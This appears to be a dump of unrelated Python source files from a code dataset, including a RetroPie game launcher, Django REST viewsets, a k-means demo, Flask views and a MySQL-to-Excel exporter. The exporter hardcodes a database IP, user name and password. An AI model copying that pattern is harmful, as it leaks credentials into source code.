psutil.process_iter():\n if proc.name() in procnames:\n pid = str(proc.as_dict(attrs=['pid'])['pid'])\n name = proc.as_dict(attrs=['name'])['name']\n subprocess.call([\"sudo\", \"kill\", \"-15\", pid])\n \n kodiproc = [\"kodi\", \"kodi.bin\"] # kodi needs SIGKILL -9 to close\n for proc in psutil.process_iter():\n if proc.name() in kodiproc:\n pid = str(proc.as_dict(attrs=['pid'])['pid'])\n name = proc.as_dict(attrs=['name'])['name']\n subprocess.call([\"sudo\", \"kill\", \"-9\", pid])\n except:\n pass\n\n## getEmulatorPath\ndef getEmulatorpath(console):\n path = \"/opt/retropie/supplementary/runcommand/runcommand.sh 0 _SYS_ \" + console + \" \"\n return path\n\n## getGamePath\ndef getGamePath(console, game):\n # escape the spaces and brackets in game filename\n game = game.replace(\" \", \"\\ \")\n game = game.replace(\"(\", \"\\(\")\n game = game.replace(\")\", \"\\)\")\n game = game.replace(\"'\", \"\\\\'\")\n \n gamePath = \"/home/pi/RetroPie/roms/\" + console + \"/\" + game\n return gamePath\n\ndef process_exists(proc_name):\n try:\n ps = subprocess.Popen(\"ps ax -o pid= -o args= \", shell=True, stdout=subprocess.PIPE)\n ps_pid = ps.pid\n output = ps.stdout.read()\n ps.stdout.close()\n ps.wait()\n for line in output.split(\"\\n\"):\n res = re.findall(\"(\\d+) (.*)\", line)\n if res:\n pid = int(res[0][0])\n if proc_name in res[0][1] and pid != os.getpid() and pid != ps_pid:\n return True\n return False\n except:\n return False\n\ndef process_id(proc_name):\n try:\n ps = subprocess.Popen(\"ps ax -o pid= -o args= \", shell=True, stdout=subprocess.PIPE)\n ps_pid = ps.pid\n output = ps.stdout.read()\n ps.stdout.close()\n ps.wait()\n for line in output.split(\"\\n\"):\n res = re.findall(\"(\\d+) (.*)\", line)\n if res:\n pid = int(res[0][0])\n if proc_name in res[0][1] and pid != os.getpid() and pid != ps_pid:\n return pid\n return 0\n except:\n return 0\n\n## runGame\ndef runGame(console, game, source):\n try:\n # update status\n f = open('/home/pi/scripts/picontrol/configs/status.conf', 'rw+')\n f.seek(0)\n f.truncate()\n f.seek(0)\n f.write(source)\n f.close()\n\n emulationstationRunning = process_exists('emulationstation')\n\n procnames = [\"retroarch\", \"ags\", \"uae4all2\", \"uae4arm\", \"capricerpi\", \"linapple\", \"hatari\", \"stella\",\n \"atari800\", \"xroar\", \"vice\", \"daphne\", \"reicast\", \"pifba\", \"osmose\", \"gpsp\", \"jzintv\",\n \"basiliskll\", \"mame\", \"advmame\", \"dgen\", \"openmsx\", \"mupen64plus\", \"gngeo\", \"dosbox\", \"ppsspp\",\n \"simcoupe\", \"scummvm\", \"snes9x\", \"pisnes\", \"frotz\", \"fbzx\", \"fuse\", \"gemrb\", \"cgenesis\", \"zdoom\",\n \"eduke32\", \"lincity\", \"love\", \"alephone\", \"micropolis\", \"openbor\", \"openttd\", \"opentyrian\",\n \"cannonball\", \"tyrquake\", \"ioquake3\", \"residualvm\", \"xrick\", \"sdlpop\", \"uqm\", \"stratagus\",\n \"wolf4sdl\", \"solarus\", \"emulationstation\"]\n killTasks(procnames)\n\n pid = os.fork()\n if not pid:\n try:\n if ((emulationstationRunning == False and source == '') or console == ''):\n subprocess.call('emulationstation', shell=True)\n else:\n print(getEmulatorpath(console) + getGamePath(console,game))\n except:\n pass\n os._exit(0)\n else: \n response = {'type':'success','data':'','message':'Successfully started game.'}\n return response\n except:\n return {'type':'error','data':'','message':'Failed to start game.'}\n\n#////////////\n","sub_path":"processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210375398","text":"from django.shortcuts import render\nfrom django.conf import settings\n\nfrom rest_framework import authentication, permissions, viewsets, filters, mixins\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\n\nfrom .models import Church, Person, Interest, SkillAndProfession, \\\n SpiritualMilestone, Ministry, MemberStatus, PersonInterest, \\\n PersonSkillAndProfession, PersonSpiritualMilestone\nfrom .serializers import ChurchSerializer, PersonSerializer, \\\n InterestSerializer, SkillAndProfessionSerializer, \\\n SpiritualMilestoneSerializer, MinistrySerializer, MemberStatusSerializer, \\\n PersonInterestSerializer, PersonSkillAndProfessionSerializer, \\\n PersonSpiritualMilestoneSerializer\nfrom .forms import PersonInterestFilter, PersonSkillAndProfessionFilter, \\\n PersonSpiritualMilestoneFilter\n\n\nclass DefaultsMixin(object):\n \"\"\"\n Default settings for view authentication, permissions,\n filtering and pagination.\n \"\"\"\n if settings.DEBUG:\n authentication_classes = (\n authentication.BasicAuthentication,\n JSONWebTokenAuthentication,)\n else:\n authentication_classes = (JSONWebTokenAuthentication,)\n\n permission_classes = (\n permissions.IsAuthenticated,\n )\n\n\nclass ChurchViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"API Endpoint for listing and creating daughter churches\"\"\"\n queryset = Church.objects.all()\n serializer_class = ChurchSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', 'church_type', )\n\n\nclass InterestViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Interest List\n \"\"\"\n\n queryset = Interest.objects.all()\n serializer_class = InterestSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass SkillAndProfessionViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Skills and Professions List\n \"\"\"\n\n queryset = SkillAndProfession.objects.all()\n serializer_class = SkillAndProfessionSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass SpiritualMilestoneViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Spiritual Milestones List\n \"\"\"\n\n queryset = SpiritualMilestone.objects.all()\n serializer_class = SpiritualMilestoneSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass MinistryViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Ministry List\n \"\"\"\n\n queryset = Ministry.objects.all()\n serializer_class = MinistrySerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass MemberStatusViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Member Statuses List\n \"\"\"\n\n queryset = MemberStatus.objects.all()\n serializer_class = MemberStatusSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass PersonViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing and creating daughter churches\n \"\"\"\n\n queryset = Person.objects.all()\n serializer_class = PersonSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('first_name', 'last_name',)\n ordering_fields = ('first_name', 'last_name', )\n\n\nclass PersonInterestViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Interest\n \"\"\"\n\n queryset = PersonInterest.objects.all()\n serializer_class = PersonInterestSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonInterestFilter\n\n\nclass PersonSkillAndProfessionViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Skills/Professions\n \"\"\"\n\n queryset = PersonSkillAndProfession.objects.all()\n serializer_class = PersonSkillAndProfessionSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonSkillAndProfessionFilter\n\n\nclass PersonSpiritualMilestoneViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Spiritual Milestone\n \"\"\"\n\n queryset = PersonSpiritualMilestone.objects.all()\n serializer_class = PersonSpiritualMilestoneSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonSpiritualMilestoneFilter\n","sub_path":"ChMS_project/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98644836","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def kthSmallest1(self, root: TreeNode, k: int) -> int:\n ans = float('-inf')\n def inorder(node):\n nonlocal k, ans\n if ans != float('-inf'): # already find an answer, skip following operations\n return\n\n if not node:\n return None\n\n inorder(node.left)\n k = k - 1\n if k == 0:\n ans = node.val\n inorder(node.right)\n\n inorder(root)\n return int(ans)\n\n #iterative\n def kthSmallest2(self, root: TreeNode, k: int) -> int:\n self.ans = 0\n self.cnt = k\n\n stack = []\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n k = k - 1\n if k == 0:\n break\n root = root.right\n\n return root.val\n","sub_path":"solutions/tree/problem230_Kth Smallest Element in a BST.py","file_name":"problem230_Kth Smallest Element in a BST.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148670481","text":"\"\"\"\nFortune Teller (Horoscope) - A program that checks your horoscope on various astrology sites and\nputs them together for you each day.\n\"\"\"\nimport sys\n# noinspection PyCompatibility\nimport urllib.request as ur\nfrom bs4 import BeautifulSoup\n\n\ndef horoscope(sign):\n \"\"\"\n :param sign:\n \"\"\"\n url = 'http://my.horoscope.com/astrology/free-daily-horoscope-%s.html' % sign\n html_doc = ur.urlopen(url)\n soup = BeautifulSoup(html_doc.read(), features=\"lxml\")\n text = soup.find_all(id=\"textline\")[1].get_text()\n date = soup.find_all(id='advert')[1].get_text()\n print(\"%s - %s\\n\\n%s\" % (sign.capitalize(), date, text))\n\n\nif __name__ == '__main__':\n try:\n horoscope(sys.argv[1])\n except IndexError:\n print(\"Please enter a valid zodiac sign.\\nUsage example: python horoscope.py taurus\")\n","sub_path":"projects/numbering/fortune.py","file_name":"fortune.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"515539604","text":"#!/usr/bin/python\r\nimport logging, utils, curses\r\n\r\nclass CursesHandler(logging.Handler):\r\n \"\"\"\r\n Creates a curses object to interface with a terminal output.\r\n \"\"\"\r\n\r\n def __init__(self, screen):\r\n \"\"\"Constructor for the CursesHandler calssself.\r\n\r\n Keyword arguments:\r\n self -- The caller, the new CursesHandler\r\n screen -- presumably where the graphics will be displayed\r\n\r\n Side effects:\r\n - Sets instance variables\r\n - Sets the color for curses\r\n \"\"\"\r\n logging.Handler.__init__(self)\r\n self.screen = screen\r\n\r\n curses.start_color()\r\n curses.use_default_colors()\r\n for i in range(0, curses.COLORS):\r\n curses.init_pair(i + 1, i, -1)\r\n\r\n def emit(self, record):\r\n \"\"\"\r\n This method tries to esablish a connection with the screen and refresh\r\n\r\n Keyword arguments:\r\n self -- The caller\r\n record -- The location that handles the Error\r\n\r\n Side effects:\r\n -Creates a screen object and sets it up\r\n \"\"\"\r\n try:\r\n screen = self.screen\r\n screen.addstr(u'\\n%s' % self.format(record), self.get_color_pair(record.levelno))\r\n screen.refresh()\r\n except (KeyboardInterrupt, SystemExit):\r\n raise\r\n except:\r\n self.handleError(record)\r\n\r\n def get_color_pair(self, level):\r\n \"\"\"\r\n Returns a color pair based on a level.\r\n\r\n Keyword arguments:\r\n self -- The caller\r\n level -- the index of the color in the array\r\n \"\"\"\r\n index = str(level)\r\n return curses.color_pair({\r\n '10': 83,\r\n '20': 39,\r\n '30': 245,\r\n '40': 167,\r\n '50': 197\r\n }[index])\r\n","sub_path":"src/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"350312150","text":"from django.contrib.auth.models import User\n\nfrom daiquiri.core.utils import send_mail\n\n\ndef get_manager_emails():\n return [user.email for user in User.objects.filter(groups__name='meetings_manager')]\n\n\ndef send_registration_mails(request, meeting, participant, contribution=None):\n # sends an email to the admins once a user was activated.\n send_mail(request, 'meetings/email/notify_registration', {\n 'meeting': meeting,\n 'participant': participant,\n 'contribution': contribution\n }, get_manager_emails())\n\n # sends an email to the once he/she was activated.\n send_mail(request, 'meetings/email/registration', {\n 'meeting': meeting,\n 'participant': participant,\n 'contribution': contribution\n }, [participant.email])\n","sub_path":"daiquiri/meetings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206601181","text":"\"\"\"\nexample of accessing/using newton_fcn_modname outside of nk_driver\n\"\"\"\n\nimport configparser\nimport importlib\nimport logging\nimport sys\n\nfrom model_config import ModelConfig\nfrom nk_driver import parse_args\n\nargs = parse_args()\nconfig = configparser.ConfigParser()\nconfig.read(args.cfg_fname)\n\nlogging_format = '%(asctime)s:%(process)s:%(filename)s:%(funcName)s:%(message)s'\nlogging.basicConfig(format=logging_format, stream=sys.stdout, level='DEBUG')\nlogger = logging.getLogger(__name__)\n\nModelConfig(config['modelinfo'])\n\n# import module with NewtonFcn class\nnewton_fcn_mod = importlib.import_module(config['modelinfo']['newton_fcn_modname'])\nnewton_fcn_obj = newton_fcn_mod.NewtonFcn()\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00.nc')\nms.log('iterate_test_00')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00.nc')\nms.log('fcn_test_00')\n\nms = newton_fcn_obj.model_state_obj('w_test_00.nc')\nms.log('w_test_00')\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00_fp1.nc')\nms.log('iterate_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00_fp1.nc')\nms.log('fcn_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('w_test_00_fp1.nc')\nms.log('w_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00_fp2.nc')\nms.log('iterate_test_00_fp2')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00_fp2.nc')\nms.log('fcn_test_00_fp2')\n\nms = newton_fcn_obj.model_state_obj('w_test_00_fp2.nc')\nms.log('w_test_00_fp2')\n","sub_path":"model_standalone.py","file_name":"model_standalone.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"339645115","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 21 00:12:56 2019\n\n@author: brgupta\n\"\"\"\n\n# K-means cluster \n\n# importing the library\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# importing the mall dataset with pandas\ndataset=pd.read_csv('Mall_Customers.csv')\nx = dataset.iloc[:,[3,4]].values\n\n# importing the mail dataset with pandas\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1,11):\n kmeans = KMeans(n_clusters =i ,init='k-means++',max_iter=300,n_init=10,random_state=0)\n kmeans.fit(x)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1,11),wcss)\nplt.title('The Elbow method')\nplt.xlabel('number of clusters')\n#plt.y_lable(wcss)\nplt.show()\n\n\n# applying K-means to the mall dataset\nkmeans = KMeans(n_clusters=5,init='k-means++',max_iter=300,n_init=10,random_state=0)\ny_means = kmeans.fit_predict(x)\nplt.scatter(x[y_means == 0,0],x[y_means == 0,1],s=100,c='red',label='Cluster 1:Careful')\nplt.scatter(x[y_means == 1,0],x[y_means == 1,1],s=100,c='blue',label='Cluster 2:standard')\nplt.scatter(x[y_means == 2,0],x[y_means == 2,1],s=100,c='green',label='Cluster 3: target')\nplt.scatter(x[y_means == 3,0],x[y_means == 3,1],s=100,c='magenta',label='Cluster 4:careless')\nplt.scatter(x[y_means == 4,0],x[y_means == 4,1],s=100,c='yellow',label='Cluster 5:sensible')\nplt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=300,c='black',label='Centroids')\nplt.title('Clusters of client')\nplt.xlabel('Anual income (k$))')\nplt.ylabel('Spending score (1-100)')\nplt.legend()\nplt.show()\n","sub_path":"Clustering/K-MeansClustering/k-means-cluster.py","file_name":"k-means-cluster.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614950680","text":"import sys\nimport re\nfrom textblob import TextBlob\nfrom collections import Counter\n\nn=6000\ntrain_n = 5000\ntest_n = 1000\nallwords = re.findall('\\w+',open(sys.argv[1]).read())\nword_list = Counter(allwords).most_common(n)\n\n\nm = open(sys.argv[6],\"r\")\ntags={}\nfor line in m:\n\tpair = line.split('\\t')\n\ttags[pair[0]] = pair[1].rstrip()\nm.close()\n\nf1= open(sys.argv[2],\"w\")\nf2 = open(sys.argv[3],\"w\")\nsource = sys.argv[4]\ntarget =sys.argv[5]\ncount = 0\nfor word in word_list:\n\tword_map = TextBlob(word[0]).translate(from_lang=source,to=target)\n\ttag = tags[TextBlob(word[0]).tags[0][1]]\n\tword_pair = (word[0].rstrip() + \"_\" + tag + \" \" + word_map.string + \"_\" + tag + \"\\n\")\n\tcount = count + 1\n\tif count <= train_n:\n\t\tf1.write(word_pair.encode('utf8'))\n\telse :\n\t\tf2.write(word_pair.encode('utf8'))\n\t#print(word_pair.encode('utf8'))\n\t\n\nf1.close()\nf2.close()\n\t\n","sub_path":"src/dictionary/Create_dictionary.py","file_name":"Create_dictionary.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475849053","text":"from flask import render_template, redirect, url_for, session\nfrom flask_login import login_required\nfrom .forms import SearchForm\nfrom . import main\nfrom ..scrape import scrape_all\n\n\n# Front page\n@main.route('/', methods=['GET'])\ndef index():\n\treturn render_template('index.html')\n\n\n# Handles user search input\n@main.route('/search', methods=['GET', 'POST'])\n@login_required\ndef search():\n\tscrape_all()\n\tproducer = None \n\tyear = None\n\tform = SearchForm()\n\n\t# If handling a POST request, set values for the session and redirect\n\tif form.validate_on_submit():\n\t\tsession['producer'] = form.producer.data\n\t\tsession['year'] = form.year.data\n\t\treturn redirect(url_for('.search'))\n\n\t# If handling a GET request, render the template \n\treturn render_template('search.html', form=form, producer=session.get('producer'), year=session.get('year'))\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50573385","text":"from datetime import timedelta\n\nfrom django.db import models\nfrom django.db.models.query_utils import Q\n\n\nclass EventManager(models.Manager):\n \"\"\"Provides several extra handy methods to find events.\"\"\"\n def get_queryset(self):\n return super(EventManager, self).get_queryset().filter(deleted=False)\n\n def occuring_at(self, start, end):\n \"\"\"Returns the events that occur (partially or entirely) between the\n given start and end datetimes.\n \"\"\"\n # An event is in the given interval if the event's start or end date\n # is in the given interval, or when the start date is before the given\n # interval and the end date is after the given interval.\n #\n # START --------------------------------- END\n # o----------------\n # --------------o\n # o--------------------------------------------------o\n return self.get_queryset() \\\n .filter(\n # start < start_date < end\n (Q(starts_at__gt=start) & Q(starts_at__lt=end)) |\n # start < end_date < end\n (Q(ends_at__gt=start) & Q(ends_at__lte=end)) |\n # start <= start_date & end_date => end\n (Q(starts_at__lte=start) & Q(ends_at__gte=end)))\n\n\nclass StandardReservationManager(models.Manager):\n def occuring_at(self, start, end):\n start_day = start.isoweekday()\n start_time = start.time()\n end_day = end.isoweekday()\n end_time = end.time()\n\n # Case I: the event takes more then one week: all reservations are\n # conflicting\n if (end - start) > timedelta(weeks=1):\n return self.get_queryset().all()\n\n # The end day is before the start day. This means that we got through\n # sunday, and we just split up the result.\n elif end_day < start_day:\n monday0am = (end - timedelta(days=(end_day - 1))).replace(hour=0, minute=0, second=0, microsecond=0)\n return (self.occuring_at(start, monday0am - timedelta(seconds=1)) | self.occuring_at(monday0am, end))\n\n # No special case, we just have to\n else:\n return self.get_queryset() \\\n .filter(\n ((Q(start_day=start_day) & Q(start_time__gt=start_time) |\n Q(start_day__gt=start_day)) & # db.start > ob.start\n (Q(start_day=end_day) & Q(start_time__lt=end_time) |\n Q(start_day__lt=end_day))) | # db.start < ob.end\n ((Q(end_day=start_day) & Q(end_time__gt=start_time) |\n Q(end_day__gt=start_day)) & # db.end > ob.start\n (Q(end_day=end_day) & Q(end_time__lt=end_time) |\n Q(end_day__lt=end_day))) | # db.end < ob.end\n ((Q(start_day=start_day) & Q(start_time__lt=start_time) |\n Q(start_day__lt=start_day)) & # db.start < ob.start\n (Q(end_day=end_day) & Q(end_time__gt=end_time) |\n Q(end_day__gt=end_day))) # db.end > ob.end\n )\n","sub_path":"apps/scheduling/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348751786","text":"from keras.preprocessing.image import ImageDataGenerator\nimport logging\nimport glob\nimport pathlib\nimport cv2\nimport numpy as np\nimport os\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import array_to_img\nfrom PIL import Image\n\nclass DataModification:\n def __init__(self, validation_data_path, training_data_path, class_labels):\n #self.validation_data_path = self.__dataaugmentation__(validation_data_path)\n self.training_data_path = self.__dataaugmentation__(\"C:/predictions/image\")\n \n\n def __dataaugmentation__(self, data_path):\n trainDataGenerator = ImageDataGenerator(shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True, rotation_range=20, vertical_flip=True, \n height_shift_range=0.2)\n filenames = glob.glob(data_path + '/*/*.JPG', recursive=\"True\") \n \n for path in filenames:\n img = cv2.imread(path, cv2.IMREAD_UNCHANGED) \n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (224,224), interpolation = cv2.INTER_AREA)\n img = img_to_array(img)\n img = np.expand_dims(img, axis=0)\n #img = Image.open(path)\n #mg = img.resize((224,224), Image.ANTIALIAS)\n #img = np.expand_dims(img, axis=0)\n pathlib.Path('{}/{}/{}'.format(data_path, 'augmented',\n path.split(os.path.sep)[-2])).mkdir(\n parents=True, exist_ok=True)\n # print(path)\n total = 0\n for image in trainDataGenerator.flow(img, batch_size=1,\n save_to_dir='{}/{}/{}'.format(data_path, 'augmented',\n path.split(os.path.sep)[-2]), save_format='png'):\n\n # print(total)\n total += 1\n if total == 150:\n break\n return (data_path + \"/augmented\")\n\ndef myFunc(image):\n image = np.array(image)\n hsv_image = cv2.cvtColor(image,cv2.COLOR_RGB2HSV)\n return Image.fromarray(hsv_image)\n\n#DataModification(\"C:/HiDrive/valid/\",\"C:/HiDrive/train/\", [\"\"])\n\n \n \n \n","sub_path":"dataaugmentation.py","file_name":"dataaugmentation.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22975669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPolitcal data prep for project \n\n\"\"\"\n\nimport pandas as pd\n\n#be sure your working directory is referencing the top level of github repository CS5010_Project\n\nlongpath = \"project_data_prep/datasets/\"\n\ninput_file = longpath + \"county_pres.csv\"\n\ndf = pd.read_csv(input_file)\n\n#filter to just 2016 presidential election\ndf_year_2016 = df.loc[df[\"year\"]== 2016,:]\n\n#rename the \"na\" candidate votes to \"other\"\ndf_year_2016['party'].fillna(value='Other', inplace = True)\n\n#filter out the rows where county is a null value\nnew_df = df_year_2016[df_year_2016['FIPS'].notnull()]\n\n#we dropped 9 null values for county \n#this dataframe will allow you to see the rows I am dropping for context\n#these rows do not pertain to a county so we can drop with confidence\n\nnull_df = df_year_2016[df_year_2016['FIPS'].isnull()]\n\n#extract just the columns that we need for analysis\nnew_df_subset = new_df[['FIPS','party','candidatevotes','totalvotes']]\n\n#pivot the party column \n\nfinal_df = pd.pivot_table(new_df_subset,values='candidatevotes',columns=['party'], index=['FIPS','totalvotes'])\nfinal_df.reset_index(inplace = True)\n\nfinal_df['FIPS'] = final_df['FIPS'].astype(int)\n\n#add .astype(str) to convert to string\n\n\n#rename for readability\nfinal_df.rename(columns= {'Other':'other_votes','democrat':'democrat_votes','republican':'republican_votes'}, inplace=True)\n\n","sub_path":"project_data_prep/political_data_prep.py","file_name":"political_data_prep.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16679149","text":"# coding=utf-8\nimport pymysql\nimport xlwt\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef get_conn():\n conn = pymysql.connect(host = \"192.168.6.73\", user='opensips', passwd='opensipsrw', charset='utf8')\n return conn\n\n\ndef query_all(cur, sql, args):\n cur.execute(sql, args)\n return cur.fetchall()\n\n\ndef read_mysql_to_xlsx(filename):\n list_table_head = ['id','企业名称', '备注','起始号码','结束号码']\n workbook = xlwt.Workbook(encoding = 'utf-8')\n sheet = workbook.add_sheet('data', cell_overwrite_ok=True)\n for i in range(len(list_table_head)):\n sheet.write(0, i, list_table_head[i])\n\n conn = get_conn()\n cur = conn.cursor()\n # sql = 'select e.id,e.name as \"企业名称\",e.remark as \"备注\",ns.numbers_min as \"起始号码\",ns.numbers_max as \"结束号码\" from shyl.numbers_segment ns left join shyl.enterprise e on e.id=ns.enterprise_id where e.expiry_date < now();'\n sql = 'select e.id,e.name as \"企业名称\",e.remark as \"备注\",ns.numbers_min as \"起始号码\",ns.numbers_max as \"结束号码\" from shyl.numbers_segment ns left join shyl.enterprise e on e.id=ns.enterprise_id where e.expiry_date > now();'\n results = query_all(cur, sql, None)\n print(results)\n conn.commit()\n cur.close()\n conn.close()\n row = 1\n for result in results:\n col = 0\n # print(type(result))\n # print(result)\n for item in result:\n print(item)\n sheet.write(row, col, item)\n col += 1\n row += 1\n workbook.save(filename)\n\n\nif __name__ == '__main__':\n read_mysql_to_xlsx('/tmp/未过期体验号.xls')","sub_path":"commonly_script/mysql_get_to_exel.py","file_name":"mysql_get_to_exel.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"458248271","text":"from random import randint, choice\nfrom turtle import Turtle, Screen\nt = Turtle()\ncolors = ['red', 'blue', 'green', 'yellow', 'purple', 'coral',\n 'brown', 'chocolate4', 'darkSalmon', 'deepskyblue', 'lightgreen']\n\n\ndef paint(sides):\n t.color(choice(colors))\n for _ in range(sides):\n t.forward(100)\n t.right(360 / sides)\n\n\nfor x in range(3, 11):\n paint(x)\n\n\ns = Screen()\ns.exitonclick()\n","sub_path":"18/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431809971","text":"# io - Input & Output with Artificial Intelligence (ai) support on AVR. {{{\n#\n# Copyright (C) 2013 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 